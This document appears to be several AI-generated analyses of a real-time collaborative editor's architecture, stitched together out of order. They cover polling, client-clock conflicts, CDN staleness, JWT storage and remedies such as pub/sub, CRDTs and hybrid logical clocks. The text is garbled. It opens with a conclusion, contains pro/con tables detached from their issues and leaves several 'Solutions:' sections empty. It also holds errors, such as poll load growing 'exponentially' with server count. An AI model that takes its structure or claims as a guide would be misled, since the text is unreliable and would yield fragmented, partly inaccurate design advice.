In summary, this architecture has solid foundations but needs enhancements for real-time consistency, resilience, and scalability. Addressing these issues will require balancing trade-offs like added complexity versus improved reliability. I recommend prioritizing solutions based on your expected traffic and failure tolerance (e.g., start with pub/sub for race conditions). If you'd like, I can help refine a prioritized implementation plan.
Let’s analyze the architecture of this real-time collaborative document editor for potential failure modes, race conditions, and scaling bottlenecks. I’ll identify the issues, explain their implications, and propose specific solutions along with their trade-offs. The issues are categorized based on the components and strategies in the system.
Use pessimistic row locking (`SELECT FOR UPDATE`) or optimistic concurrency control with version numbers for documents. Each update checks the version before committing.
| Issue | Impact | Solution | Trade-offs |
|---|---|---|---|
| WebSocket Connection Failures | User disconnection | Redis Pub/Sub for connection management | Complexity, latency |
| Client Clock Timestamp Issues | Data loss in conflicts | Server-side or vector clocks | Complexity, storage overhead |
| PostgreSQL Write Contention | Slow writes, bottlenecks | Batching, sharding | Latency, query complexity |
| Polling Overhead | Database load | Pub/Sub (Redis, Kafka) | Additional infrastructure |
| CDN Stale Data | Outdated responses | Short TTL or disable caching | Increased server load |
| Lack of OT/CRDT | Poor conflict resolution | Implement OT or CRDT | High implementation complexity |
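The vector‑clock option in the table detects true concurrency instead of silently dropping edits the way client‑clock LWW does. A minimal comparison sketch (clocks are plain objects mapping node ID to counter; the node names are illustrative):

```javascript
// Compare two vector clocks: a "happens before" b only if every
// component of a is <= b and at least one is strictly less. If each
// clock is ahead in some component, the edits are concurrent and must
// go through explicit conflict resolution.
function compare(a, b) {
  const nodes = new Set([...Object.keys(a), ...Object.keys(b)]);
  let less = false, greater = false;
  for (const n of nodes) {
    const x = a[n] ?? 0, y = b[n] ?? 0;
    if (x < y) less = true;
    if (x > y) greater = true;
  }
  if (less && !greater) return "before";
  if (greater && !less) return "after";
  if (!less && !greater) return "equal";
  return "concurrent"; // true conflict: neither edit saw the other
}
```

Usage: `compare({A: 1}, {A: 2})` yields `"before"`, while `compare({A: 2, B: 0}, {A: 1, B: 1})` yields `"concurrent"`, which is exactly the case where last‑write‑wins would silently lose one user's edit.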
This analysis highlights critical areas for improvement in fault tolerance, consistency, and scalability. Addressing these issues will make the system more robust for real-time collaboration at scale, though each solution introduces trade-offs that must be evaluated based on the project’s priorities (e.g., cost, performance, or simplicity).
Below, I'll systematically identify potential failure modes, race conditions, and scaling bottlenecks in the described architecture for a real-time collaborative document editor. I've categorized them for clarity, drawing from the system overview, data flow, and scaling plan you provided. For each issue, I've proposed a specific, actionable solution along with its trade-offs (e.g., benefits, drawbacks, complexity, and performance impacts). These are based on common pitfalls in distributed real-time systems like this one, which relies on WebSockets, polling, and a central database.
I've aimed to be comprehensive but focused on the most critical issues directly tied to the architecture. Note that some issues overlap categories (e.g., a race condition could lead to a failure mode), but I've grouped them logically.
These are scenarios where parts of the system could fail, leading to data loss, downtime, or inconsistent behavior.
Issue: PostgreSQL as a single point of failure. All changes are written to and polled from PostgreSQL. If the primary PostgreSQL instance fails (e.g., due to hardware issues, overload, or network partition), document updates stop propagating, servers can't sync, and the system becomes read-only or unresponsive. Read replicas help with reads but not writes.
Issue: API server failure disrupts WebSocket connections. Each server manages its own WebSocket clients. If a server crashes or is taken offline (e.g., for maintenance), connected clients lose their real-time updates, and changes they send aren't broadcast or persisted until reconnection (potentially to a different server via the load balancer).
Issue: Redis session cache failure leads to authentication issues. If Redis goes down, session data (e.g., active user sessions) is lost, forcing users to re-authenticate and potentially disrupting real-time collaboration mid-session.
Issue: Full HTML snapshots every 30 seconds risk data loss on crashes. If a server crashes between snapshots, any unsaved changes (up to 30 seconds' worth) are lost, as changes are only written to PostgreSQL per-event but snapshots are the "full" persisted state.
Issue: JWT tokens in localStorage are vulnerable to XSS attacks or token expiry mid-session. A 24-hour expiry means tokens can expire during long editing sessions, interrupting workflow. LocalStorage also exposes tokens to client-side attacks.
Issue: CDN caching of API responses causes stale data in real-time scenarios. CloudFront caches API responses for 5 minutes, but real-time document changes could make cached responses outdated, leading to users seeing inconsistent document states.
These involve timing issues where concurrent operations lead to inconsistent or lost data.
Issue: Client-side timestamps for last-write-wins conflict resolution are unreliable. Client clocks can be desynchronized (e.g., due to time zones, drift, or manipulation), causing incorrect "wins" in conflicts. For example, if two users edit the same paragraph simultaneously, a user with a slightly advanced clock could overwrite valid changes indefinitely.
Issue: Polling delay (every 2 seconds) causes inconsistent views across servers. Users on different servers might see divergent document states for up to 2 seconds (or more under load), leading to races where one user overwrites another's changes before they're visible.
Issue: Concurrent writes to PostgreSQL without proper locking. If multiple servers attempt to write conflicting changes to the same document row simultaneously (e.g., during a poll-sync), it could result in lost updates or corruption, especially without transactions or locks.
These are limitations that hinder performance as users/documents grow.
Issue: Polling PostgreSQL every 2 seconds from each API server creates a read bottleneck. With horizontal scaling (more servers), the database faces exponentially more poll queries, leading to high CPU/load and potential throttling.
Issue: Write-heavy PostgreSQL operations for every change. Every WebSocket event writes to PostgreSQL, which could bottleneck on IOPS/write throughput as user count grows, especially without sharding beyond org ID partitioning.
Issue: Per-server WebSocket connections limit horizontal scaling. Each Node.js server has finite resources (e.g., memory/file descriptors) for WebSockets. As users grow, servers could hit connection limits, and load balancing doesn't distribute WebSockets evenly.
Issue: Full HTML snapshots bloat storage and slow operations for large documents. Saving entire documents every 30 seconds consumes storage and I/O, especially for large or frequently edited docs, limiting scalability.
Issue: Uneven partitioning by organization ID leads to hotspots. If some organizations have disproportionately active documents, their partitions overload while others idle, bottlenecking the database.
This architecture has solid foundations but leans heavily on a central database and polling, which are common anti-patterns for real-time scaling. Addressing these would make it more robust, but prioritize based on your expected load (e.g., focus on polling if scaling to many servers). If you provide more details (e.g., expected user count), I can refine these further.
| Pro | Con |
|---|---|
| Ensures low-latency broadcasts within server groups | Uneven load distribution (hot servers with popular docs get overloaded) |
| Simple to implement | Single server failure affects all its clients (mitigate with health checks/auto-scaling) |
Use server‑generated timestamps (`now()` or monotonic server clocks) on write, rejecting or queuing client changes with older timestamps.
| Pro | Con |
|---|---|
| Reliable, consistent ordering | Increases round-trip latency (client waits for server ACK before UI update) |
| Easy DB enforcement via unique constraints | Doesn't handle true simultaneous edits (pair with OT/CRDTs for better resolution) |
Use PostgreSQL `LISTEN/NOTIFY` for pub/sub: on write, the server sends `NOTIFY` on a channel per document/org ID; other servers subscribe and broadcast changes to their WebSocket clients.
| Pro | Con |
|---|---|
| Near-real-time (<100ms), low overhead | Each server needs a persistent PG connection (risk of connection pool exhaustion; limit to 1/subscription) |
| No external deps | PG notify doesn't scale to millions of channels (shard channels by org ID) |
| Pro | Con |
|---|---|
| Preserves intent, no data loss | High complexity/debugging (OT requires server-side transformation) |
| Bandwidth-efficient diffs | CRDTs: higher storage (tombstones); OT: causal ordering latency |
| Pro | Con |
|---|---|
| Reduces writes 90%+, linear storage growth | Load time increases for long sessions (mitigate with CDN-cached snapshots) |
| Enables rewind/undo | Computation overhead on reconstruct (offload to workers) |
| Pro | Con |
|---|---|
| XSS-proof | CSRF risk (mitigate with CSRF tokens or double-submit cookies) |
| Works seamlessly with SPA | Slightly higher backend load for refreshes |
Use versioned URLs (`?v=timestamp`) or a short TTL (10s) with PG invalidation triggers pushing to the CDN.
| Pro | Con |
|---|---|
| Consistent real-time data | Higher backend read load (use PG read replicas) |
| Simple config change | Misses CDN perf for infrequent reads |
| Pro | Con |
|---|---|
| Horizontal scale to 1000s servers, decouples servers | Added latency (10-50ms), new infra cost/reliability |
| Handles hot docs via partitioning | Eventual consistency window (use at-least-once delivery) |
| Pro | Con |
|---|---|
| True write scalability | Cross-shard queries complex (docs stay intra-shard) |
| Leverages existing partitioning | Migration overhead, eventual consistency on sharded joins |
| Pro | Con |
|---|---|
| Resilient to failures | Brief UI freeze during sync (show "Reconnecting..." overlay) |
| Standard (e.g., Socket.io handles) | Bandwidth spike on mass reconnects |
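Reconnection clients like the one above typically pace retries with exponential backoff. A sketch of the schedule; jitter is omitted so the numbers are deterministic, but real clients should add random jitter precisely to avoid the mass‑reconnect spike the table warns about.

```javascript
// Exponential backoff: delays double from a base up to a cap.
function backoffDelays(attempts, baseMs = 500, capMs = 30000) {
  const delays = [];
  for (let i = 0; i < attempts; i++) {
    delays.push(Math.min(capMs, baseMs * 2 ** i)); // 500, 1000, 2000, ...
  }
  return delays;
}
```

A client would wait `delays[n]` milliseconds before reconnect attempt `n`, resetting the counter on a successful connection.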
| Pro | Con |
|---|---|
| Zero-downtime auth | Slightly higher CPU for sig validation |
| Simplifies scaling | Revocation harder (shorten JWT expiry + blocklist in Redis) |
| Category | High Impact Issues | Mitigation Priority |
|---|---|---|
| Scaling | Polling, WS stickiness, PG writes | High (blocks >10 servers) |
| Consistency | Timestamps, LWW conflicts | High (core UX breakage) |
| Reliability | No reconnects, Redis single-point | Medium (graceful degradation) |
| Security/Perf | JWT storage, CDN staleness | Medium (exploitable but not critical) |
This covers the major issues; implementing 1-4 + reconnection yields a production-viable system. Total refactors (e.g., OT + Pub/Sub) add 20-50% complexity but enable 10x scale.
Critical Failure Modes, Race Conditions, and Scaling Bottlenecks
Problem: "Last-write-wins with timestamps from client clocks" is fundamentally broken. Client clocks are not synchronized. A user in Australia with a clock 800ms ahead will consistently win over a user in California.
Solutions:
- Use Hybrid Logical Clocks (HLC), which combine physical time with a logical counter.
- Use server‑assigned timestamps: `now()` from a single PostgreSQL instance as source of truth.

Trade‑off: HLC adds complexity but gives causal ordering with low latency. Pure server timestamps require either a single writer per document or distributed consensus.
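A minimal hybrid‑logical‑clock sketch, assuming the standard HLC rules: the logical part `l` tracks the maximum physical time seen, and the counter `c` breaks ties when physical time has not advanced. Physical time is injected so the demo is deterministic.

```javascript
// Hybrid logical clock: timestamps are (l, c) pairs that respect
// causality even when node clocks drift.
function makeHlc(physicalNow) {
  let l = 0, c = 0;
  return {
    // Called for a local event or before sending a message.
    tick() {
      const pt = physicalNow();
      if (pt > l) { l = pt; c = 0; } else { c += 1; }
      return { l, c };
    },
    // Called when receiving a remote timestamp.
    recv(remote) {
      const pt = physicalNow();
      const maxL = Math.max(l, remote.l, pt);
      if (maxL === l && maxL === remote.l) c = Math.max(c, remote.c) + 1;
      else if (maxL === l) c += 1;
      else if (maxL === remote.l) c = remote.c + 1;
      else c = 0;
      l = maxL;
      return { l, c };
    },
  };
}

// Demo with a frozen physical clock:
let fakeTime = 10;
const clock = makeHlc(() => fakeTime);
const t1 = clock.tick();             // physical time advances the clock
const t2 = clock.tick();             // same physical time: counter bumps
const r = clock.recv({ l: 15, c: 3 }); // remote is ahead: adopt its l
```

Comparing `(l, c)` lexicographically gives an ordering that never goes backwards even when a node's wall clock does, which is the property client‑timestamp LWW lacks.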
Problem: Broadcasting raw "changes" with last-write-wins at paragraph level will cause frequent document corruption when two users edit the same paragraph or nearby text.
Solutions:
Trade-off: CRDTs have higher memory/CPU cost and larger payload sizes, but provide eventual consistency without coordination.
Problem: Changes are only broadcast to clients connected to the same server. Other servers poll every 2 seconds. This creates 0-2 second inconsistency windows and "stuttering" UX.
Solutions:
Trade-off: Adds another moving part and latency (usually <50ms), but gives consistent sub-100ms experience.
Problem: Every keystroke from every user in the organization writes to the same PostgreSQL database. This will not scale beyond ~50-100 concurrent active users per document or a few thousand total.
Solutions:
Trade-off: Eventual persistence increases risk of data loss during crashes.
Problem: Storing entire HTML document every 30s creates massive write amplification and makes versioning/history nearly impossible.
Solutions:
Problem: Multiple users can edit the same paragraph with no visual indication or locking strategy.
Solutions: Implement presence (who is typing where) and either:
Problem: Tokens in localStorage are vulnerable to XSS. 24h expiry with no refresh token rotation is bad practice.
Solutions:
Problem: Round-robin without sticky sessions means a user can be reconnected to a different server, losing real-time continuity.
Solutions: Use sticky sessions (by IP or better, by JWT claim) or make WebSocket connections stateless via a pub/sub layer.
Problem: No mention of how clients handle reconnection, missed messages, or offline editing.
Solutions: Implement sequence numbers on operations and allow clients to replay missed changes on reconnect. Consider CRDTs which handle this naturally.
Database:
Memory/CPU per Server:
Redis:
Current architecture will work for demos or very small teams but will fail badly at even moderate scale or with concurrent editing.
The fundamental issues are:
These are not minor issues — they are foundational design flaws in collaborative editing systems.
Here is a comprehensive analysis of the failure modes, race conditions, and scaling bottlenecks in the described architecture.
I have grouped related issues for clarity while preserving every significant problem identified.
Problems:
Solution: Replace polling with Redis Pub/Sub (leveraging the existing Redis instance). When a server writes a change, it publishes the event (keyed by document ID). Other servers subscribe only to documents their clients are actively viewing and forward changes to their WebSocket clients. Use sequence numbers or change IDs for idempotency.
Trade-offs: Adds Redis as a critical real-time path (mitigate with Redis Cluster/Sentinel). Increases operational complexity slightly but dramatically reduces DB load and latency. At extreme scale, may need a more robust broker like Kafka.
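As an in-process sketch of that fan-out pattern: the `DocumentBus` below stands in for Redis Pub/Sub (one channel per document ID), and the sequence-number check shows the idempotency the solution calls for. Class names are illustrative.

```javascript
// In-memory stand-in for the per-document fan-out pattern. In production the
// bus would be Redis Pub/Sub; here a Map of docId -> handlers keeps the
// sketch self-contained and testable.
class DocumentBus {
  constructor() {
    this.channels = new Map(); // docId -> Set of handler callbacks
  }
  subscribe(docId, handler) {
    if (!this.channels.has(docId)) this.channels.set(docId, new Set());
    this.channels.get(docId).add(handler);
    return () => this.channels.get(docId).delete(handler); // unsubscribe fn
  }
  publish(docId, change) {
    for (const h of this.channels.get(docId) ?? []) h(change);
  }
}

// Each API server subscribes only to documents its clients are actively
// viewing, and forwards changes to its own WebSocket clients, deduplicating
// by sequence number so redelivery is harmless.
class ApiServer {
  constructor(bus) {
    this.bus = bus;
    this.clients = new Map();  // docId -> array of client "sockets" (callbacks)
    this.lastSeq = new Map();  // docId -> highest sequence number applied
  }
  attachClient(docId, send) {
    if (!this.clients.has(docId)) {
      this.clients.set(docId, []);
      this.bus.subscribe(docId, (change) => this.onChange(docId, change));
    }
    this.clients.get(docId).push(send);
  }
  onChange(docId, change) {
    // Sequence numbers make delivery idempotent: drop replays.
    if (change.seq <= (this.lastSeq.get(docId) ?? 0)) return;
    this.lastSeq.set(docId, change.seq);
    for (const send of this.clients.get(docId)) send(change);
  }
}
```

With Redis in place of `DocumentBus`, two users on different API servers see each other's edits in one publish hop instead of waiting out a 0-2s polling window.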
Problems:
Solution:
Trade-offs: Server timestamps still have limitations in high-concurrency scenarios. OT/CRDTs require significant frontend and backend changes (data model shift from HTML blobs to rich deltas/positions) but provide correct merging, undo, and history. CRDTs are generally easier to scale than classic OT.
Problems:
Solution: Store a sequence of fine-grained operations/deltas (with periodic snapshots for fast loading). Keep snapshots in S3/object storage and the operation log in PostgreSQL (JSONB) or a specialized store. Implement log compaction.
Trade-offs: Adds complexity in replay/compaction logic and increases initial engineering effort. Significantly improves storage efficiency, versioning, offline support, and scalability. Replay time for very long sessions must be managed.
Problem: CloudFront caching API responses for 5 minutes will serve stale document state and changes, breaking collaboration entirely for cached requests.
Solution: Set explicit Cache-Control: no-store, no-cache, must-revalidate (and Surrogate-Control) headers on all mutable API endpoints. Use the CDN only for static assets (JS, CSS) and long-lived immutable resources.
Trade-offs: Increases origin traffic and cost slightly. This is mostly a configuration fix with minimal downside once implemented correctly.
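A minimal sketch of that header fix, written in the Express/Connect middleware shape (the function names are illustrative, and any framework with a `setHeader`-style response object works the same way):

```javascript
// Mark every mutable API response as uncacheable so the CDN never serves
// stale document state.
function noStore(req, res, next) {
  res.setHeader('Cache-Control', 'no-store, no-cache, must-revalidate');
  res.setHeader('Surrogate-Control', 'no-store'); // honored by some CDNs/proxies
  next();
}

// Static assets keep long-lived caching; `immutable` is safe when filenames
// are content-hashed, since a changed file gets a new URL.
function immutableAsset(req, res, next) {
  res.setHeader('Cache-Control', 'public, max-age=31536000, immutable');
  next();
}
```

Mounting `noStore` on the API routes and `immutableAsset` on the asset routes keeps the CDN useful for JS/CSS while taking it entirely out of the real-time path.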
Problems:
Solution: Configure sticky sessions on the load balancer (using cookies or consistent hashing). Implement client-side reconnection logic that requests the latest document state + missed changes (using sequence numbers). Monitor per-server connection counts and scale proactively. Consider a managed WebSocket service for very high scale.
Trade-offs: Sticky sessions can create hot servers for popular documents. Adds some statefulness to the otherwise stateless tier. Client reconnection logic adds frontend complexity but is essential.
Problems:
Solution: Batch changes where possible. For hot documents, route them to specialized handling (in-memory Redis state + periodic flush) or shard by document ID in addition to organization. Consider purpose-built collaborative backends or event sourcing with Kafka for the write path.
Trade-offs: Increases architecture complexity and eventual consistency window. Document-level sharding complicates cross-document queries.
Problems:
Solution: Use short-lived access tokens combined with refresh tokens stored in HttpOnly cookies. Implement proper token revocation (via Redis blacklist or short expiry). Consider OAuth/social login for better security posture.
Trade-offs: More complex authentication flow and requires CSRF protection for cookies. Significantly improves security.
Problem: A change may be written to PostgreSQL but fail to broadcast (local WS or Pub/Sub), or vice versa, leading to inconsistent views across clients. No idempotency mentioned.
Solution: Use the Outbox Pattern: write the change (and outbound message) in the same database transaction, then have a separate processor publish events. Add unique change IDs and sequence numbers for deduplication.
Trade-offs: Adds some latency and processing overhead. Much more reliable than fire-and-forget.
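A minimal outbox-pattern sketch, with in-memory arrays standing in for the PostgreSQL tables (in a real implementation `saveChangeWithEvent` would be a single SQL transaction):

```javascript
// The change and its outbound event are written in one atomic step; a
// separate relay publishes unpublished events later, so a broadcast failure
// can never leave the database and the clients permanently out of sync.
class Store {
  constructor() {
    this.changes = []; // stand-in for the document_changes table
    this.outbox = [];  // stand-in for the outbox table
  }
  // Both inserts succeed or neither does (one SQL transaction in production).
  saveChangeWithEvent(change) {
    this.changes.push(change);
    this.outbox.push({ id: change.id, published: false, payload: change });
  }
}

// Relay: scan the outbox, publish pending events, mark them published.
// Delivery is at-least-once, so consumers must dedupe by change id.
function relayOutbox(store, publish) {
  for (const evt of store.outbox) {
    if (evt.published) continue;
    publish(evt.payload); // e.g., Redis PUBLISH in production
    evt.published = true;
  }
}
```

The unique change id doubles as the deduplication key on the consumer side, which is what makes the at-least-once delivery safe.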
Additional risks:
Solutions:
Trade-offs: Increases infrastructure cost and operational burden. These are table-stakes for a production collaborative tool.
The most critical issues (in rough order) are:
This architecture can work for very small-scale usage but will fail in reliability, consistency, and performance as soon as there is meaningful concurrent usage across multiple servers.
The core problems stem from attempting to bolt real-time collaboration onto a traditional request-response architecture without using proven patterns for distributed collaborative editing.
Below is a comprehensive analysis of the provided architecture for a real-time collaborative document editor. I'll identify potential failure modes (events or conditions that could lead to system unavailability, data loss, or incorrect behavior), race conditions (situations where concurrent operations lead to unpredictable or inconsistent outcomes), and scaling bottlenecks (limitations that hinder performance or growth as load increases). For each issue, I'll describe it briefly, explain its impact, propose a specific solution, and discuss trade-offs.
I've grouped the issues by category for clarity. Note that some issues overlap categories (e.g., a failure mode could exacerbate a race condition). The analysis assumes typical real-world constraints like network unreliability, clock drift, and hardware failures, based on the described architecture.
These arise from concurrent user actions, server polling, and timestamp-based conflict resolution, potentially leading to data inconsistency or lost edits.
Client Clock Skew in Last-Write-Wins Conflict Resolution
Timestamps rely on client-side clocks, which can drift or be manually adjusted, causing incorrect ordering of edits. For example, User A (clock 10 minutes ahead) and User B (accurate clock) edit the same paragraph; A's later edit might be deemed "earlier" due to skew, overwriting B's valid change.
Solution: Implement server-side timestamps (e.g., using NTP-synchronized server clocks for each edit). Each change event includes a server-assigned timestamp upon receipt.
Trade-offs: Increases server load for timestamp assignment (minor, as it's a simple operation). Clients must trust the server clock, which could introduce slight latency (e.g., 10-50ms added to edit propagation). Requires handling out-of-order arrivals if network delays occur, but improves accuracy over client clocks.
Delayed Sync Across Servers Due to Polling
Servers poll PostgreSQL every 2 seconds for changes, creating a window where users on different servers see stale data. If User A on Server 1 edits a doc and User B on Server 2 edits the same part within a 2-second window, Server 2 might overwrite A's edit before seeing it.
Solution: Replace polling with a publish-subscribe (pub/sub) mechanism, such as using Redis pub/sub channels per document. Each server publishes changes to the channel upon writing to PostgreSQL, and all servers subscribe to receive notifications instantly.
Trade-offs: Adds complexity (e.g., managing Redis channels and ensuring message ordering). Increases Redis load (though it's lightweight for pub/sub). Eliminates polling's inefficiency but requires handling Redis failures (see failure modes below). Slightly higher latency for initial setup compared to polling.
Intra-Server Broadcasting Only
Changes are broadcast only to WebSocket clients on the same server, but users might be connected to different servers. This can cause temporary inconsistencies: e.g., User A sees an edit, but User B (on another server) doesn't until their server polls and broadcasts, potentially leading to conflicting local edits.
Solution: Use a centralized message broker (e.g., extend Redis pub/sub to include client notifications). Servers subscribe to document-specific channels and relay messages to their WebSockets.
Trade-offs: Centralizes real-time logic, reducing per-server isolation but improving consistency. Increases Redis dependency and potential single-point load (mitigate with Redis clustering). Adds a small hop (server-to-broker-to-server), introducing ~10-20ms extra latency per broadcast.
Conflict Resolution for Complex Edits
Last-write-wins on entire paragraphs (or similar units) doesn't handle granular conflicts, like one user inserting text and another deleting it in the same area. Timestamps might resolve the winner, but the losing edit is discarded entirely, causing data loss.
Solution: Adopt operational transformation (OT) or conflict-free replicated data types (CRDTs) for finer-grained merging. For example, implement a CRDT-based library (e.g., like those in Google Docs) where edits are commutative and can be merged automatically.
Trade-offs: Significantly increases complexity in the frontend and backend (e.g., needing to track operations like insert/delete at character level). Requires more CPU for merging on servers, potentially slowing edits. Improves user experience by preserving most changes, but OT/CRDTs can have edge cases in highly concurrent scenarios.
These could cause downtime, data loss, or incomplete functionality, affecting service reliability.
API Server Failure
If a server crashes, all its WebSocket connections drop, users lose unsaved edits (since snapshots are every 30 seconds), and they must reconnect (potentially to a different server, disrupting sync).
Solution: Implement auto-reconnection with session persistence in Redis (store user state and recent edits). Upon reconnection, replay missed changes from PostgreSQL or a Redis-backed event log.
Trade-offs: Adds Redis overhead for state storage. Ensures continuity but introduces a brief sync delay (e.g., 1-5 seconds) during failover. Requires client-side logic for reconnection, increasing frontend complexity.
Database (PostgreSQL) Failure
Writes fail, halting document saves and syncing. Full snapshots could be lost if a crash occurs mid-save, and polling servers would error out.
Solution: Use PostgreSQL high availability (e.g., with Patroni for automatic failover to replicas) and enable synchronous replication. Add a write-ahead log (WAL) for recovery.
Trade-offs: Increases operational complexity (e.g., managing replicas). Improves uptime but adds latency to writes (due to sync replication, ~20-50ms). Read replicas already help reads, but writes remain centralized.
Redis Failure
Session cache loss could invalidate user sessions prematurely, forcing logins. Pub/sub would break if used, halting cross-server sync.
Solution: Deploy Redis in a cluster with replication and automatic failover (e.g., using Redis Sentinel or Redis Cluster). Persist critical data (e.g., sessions) to PostgreSQL as a fallback.
Trade-offs: Higher setup cost and memory usage. Ensures reliability but doesn't eliminate all risks (e.g., brief outages during failover). Clustering adds network overhead.
WebSocket Disconnection and Network Failures
Clients can disconnect due to network issues, losing edits between snapshots. Round-robin load balancing might route reconnections to different servers, causing sync issues.
Solution: Enable sticky sessions at the load balancer (e.g., via IP hashing or session cookies) to prefer reconnecting to the same server. Add client-side buffering to queue unsaved edits for replay.
Trade-offs: Sticky sessions reduce load balancing efficiency (uneven server load). Improves edit persistence but requires more client state management, increasing memory usage on devices. Buffering adds complexity if conflicts arise during replay.
JWT Expiry and Auth Failures
JWTs expire after 24 hours, logging out users mid-session. LocalStorage storage is vulnerable to clearing (e.g., browser crashes or user actions), causing auth loss.
Solution: Implement refresh tokens: store a long-lived refresh token in a secure HTTP-only cookie and use it to auto-renew JWTs without user intervention.
Trade-offs: Enhances security (less exposure in localStorage) and user experience (seamless renewals). Adds server complexity for handling refreshes. Increases attack surface slightly if cookies are compromised.
CDN Caching of API Responses
API responses cached for 5 minutes in CloudFront could serve stale data for non-static requests (e.g., document lists), conflicting with real-time edits.
Solution: Configure cache headers to disable caching for dynamic API endpoints (e.g., use Cache-Control: no-cache for edit-related responses) or use signed URLs for sensitive data.
Trade-offs: Reduces CDN benefits for those endpoints, increasing origin server load. Improves accuracy but might raise costs if more requests hit the backend.
Snapshot-Based Storage Loss
Documents saved as full HTML snapshots every 30 seconds; crashes between saves lose recent edits. No incremental diffing means inefficient storage and recovery.
Solution: Implement incremental versioning with diffs (e.g., store change deltas in PostgreSQL or a separate log table). Use background jobs to compute and store snapshots less frequently.
Trade-offs: Reduces storage costs and improves recovery granularity. Adds computation overhead for diffs (e.g., via libraries like diff-match-patch), potentially delaying saves by 1-2 seconds.
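A minimal sketch of the delta-log-plus-snapshot idea (all names illustrative; a real system would persist the log and snapshots rather than hold them in memory):

```javascript
// Persist small deltas per edit and take a full snapshot only every N ops;
// loading a document replays just the ops recorded after the latest
// snapshot, instead of rereading full HTML blobs.
class DocLog {
  constructor(snapshotEvery = 100) {
    this.snapshotEvery = snapshotEvery;
    this.ops = [];                      // append-only delta log
    this.snapshot = { seq: 0, text: '' }; // latest materialized savepoint
  }
  append(op) {
    this.ops.push(op);
    if (this.ops.length % this.snapshotEvery === 0) {
      this.snapshot = { seq: this.ops.length, text: this.materialize() };
    }
  }
  // Rebuild current state: start from the snapshot, replay the log tail.
  // Each op deletes `op.delete` chars at `op.pos`, then inserts `op.insert`.
  materialize() {
    let text = this.snapshot.text;
    for (const op of this.ops.slice(this.snapshot.seq)) {
      text = text.slice(0, op.pos) + (op.insert ?? '') +
             text.slice(op.pos + (op.delete ?? 0));
    }
    return text;
  }
}
```

Compaction then becomes dropping ops older than the last snapshot the retention policy still needs, which is far cheaper than storing full HTML every 30 seconds.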
These limit horizontal growth or performance under load, especially with increased users or documents.
Polling-Induced Database Load
Each server polling PostgreSQL every 2 seconds scales poorly; with N servers, it's N queries per interval, overwhelming the DB even with read replicas.
Solution: As noted in race conditions, switch to Redis pub/sub for instant notifications, reducing DB queries to near zero.
Trade-offs: Shifts load to Redis (which is better suited for pub/sub). Eliminates polling waste but requires Redis to handle high message volumes; if not clustered, it becomes a bottleneck.
WebSocket Connection Limits per Server
Each Node.js server handles its own WebSockets, limited by OS/file descriptors (e.g., ~10k-100k per server). Adding servers helps, but uneven user distribution (e.g., many users editing one doc) overloads a single server.
Solution: Use a WebSocket proxy or gateway (e.g., based on Nginx or HAProxy) to distribute connections across servers dynamically, or adopt a shared WebSocket server (e.g., via Socket.IO clustering with Redis adapter).
Trade-offs: Proxy adds a single point of failure and slight latency (~5-10ms). Improves distribution but increases complexity (e.g., ensuring message routing). Clustering shares load but requires coordination.
Centralized Database Writes
All edits write to PostgreSQL master, creating a bottleneck for write-heavy loads (e.g., many concurrent edits). Read replicas help reads but not writes.
Solution: Shard documents across multiple PostgreSQL instances (e.g., by hash of document ID, beyond just org ID). Use a distributed DB like CockroachDB for built-in sharding and replication.
Trade-offs: Greatly improves write scalability. Adds complexity in query routing and cross-shard operations (e.g., harder to aggregate org-wide data). Migration from single PostgreSQL requires downtime or tooling.
Load Balancer and Uneven Distribution
Round-robin balancing doesn't account for connection stickiness or load per server, leading to hotspots (e.g., one server with many active WebSockets).
Solution: Upgrade to a smarter load balancer (e.g., AWS ALB with least-connections algorithm) or use session affinity with health checks.
Trade-offs: Better distribution improves performance. Adds configuration overhead and potential for affinity-related issues (e.g., users stuck on slow servers).
Document Partitioning Limitations
Partitioning by org ID is good for isolation but doesn't prevent bottlenecks within a large org (e.g., one org with 10k users editing the same doc overloads its partition).
Solution: Sub-partition by document ID (e.g., use a hash function to distribute docs across multiple DB shards within an org).
Trade-offs: Enhances parallelism within orgs. Increases routing complexity (e.g., needing a lookup service for shard locations). Requires careful key design to avoid hotspots.
Resource Intensity of Broadcasting
Broadcasting changes to all clients on a server scales poorly for large documents (e.g., 100 users on one server means 100 messages per edit).
Solution: Implement selective broadcasting (e.g., only send to clients viewing the edited section) using client-reported viewports or subscription models.
Trade-offs: Reduces network and CPU load per edit. Requires more client-server communication (e.g., viewport updates), adding slight overhead. May miss edge cases if viewports aren't accurately tracked.
This architecture has solid foundations (e.g., horizontal scaling and partitioning), but real-time collaboration demands tight consistency and low latency; many issues stem from the polling-based sync and over-reliance on client clocks and state. Prioritizing fixes like server-side timestamps and pub/sub would address the core races and bottlenecks. Whatever you implement, thorough testing (e.g., with simulated failures and load) is essential. Let me know if you'd like deeper dives into any solution!
Issue: When Server A broadcasts changes only to its connected clients, users on Server B don't see updates until polling occurs (2-second delay). This creates a "split-brain" experience where collaborators see different document states.
Solution: Implement a pub/sub layer using Redis Pub/Sub or Kafka.
Issue: Two users edit the same paragraph simultaneously. User A's change arrives at 10:00:01.000, User B's at 10:00:01.001. User A's change is overwritten even if User B started typing first but had network lag.
Solution: Operational Transformation (OT) or CRDTs
Issue: Client clocks can be off by seconds or minutes. A user with a fast clock could "future-stamp" changes, causing valid edits to be rejected.
Solution: Hybrid Logical Clocks (HLC)
Issue: 100 servers polling PostgreSQL every 2 seconds = 50 queries/second just for change detection. At scale, this overwhelms the database.
Solution: Change Data Capture (CDC) with Debezium
Issue: For 10,000 active documents, that's 333 full writes/second to PostgreSQL. Each snapshot is ~50KB = 16MB/s write throughput.
Solution: Incremental Snapshots + Operation Log
Issue: Each server can handle ~50,000 WebSocket connections (Node.js). At 100,000 concurrent users you need 2+ servers, but users on different servers can't collaborate in real time.
Solution: WebSocket Gateway Layer
Issue: CloudFront caching API responses for 5 minutes means users see stale document lists and permissions.
Solution: Cache-Control Headers + Versioned URLs
- `Cache-Control: private, max-age=0` for user-specific data

Issue: Stolen token grants 24 hours of access. No revocation mechanism.
Solution: Short-lived tokens + Refresh tokens
Issue: User A deletes a paragraph while User B edits it. Last-write-wins might delete User B's edits.
Solution: Intent-based Operations
Issue: All writes go to primary PostgreSQL. If it fails, system is read-only.
Solution: Multi-Master with Conflict Resolution
Issue: Network failure = no editing. Changes since last snapshot are lost.
Solution: Local Operation Queue + Sync Protocol
Current: Client → API Server → PostgreSQL
API Server → WebSocket Clients (same server only)
Improved:
1. Client → Load Balancer → API Server (business logic)
2. API Server → Redis Streams (operations log)
3. Redis Streams → All WebSocket Gateway Servers
4. WebSocket Gateway → All connected clients
5. CDC (Debezium) → Kafka → API Servers (for sync)
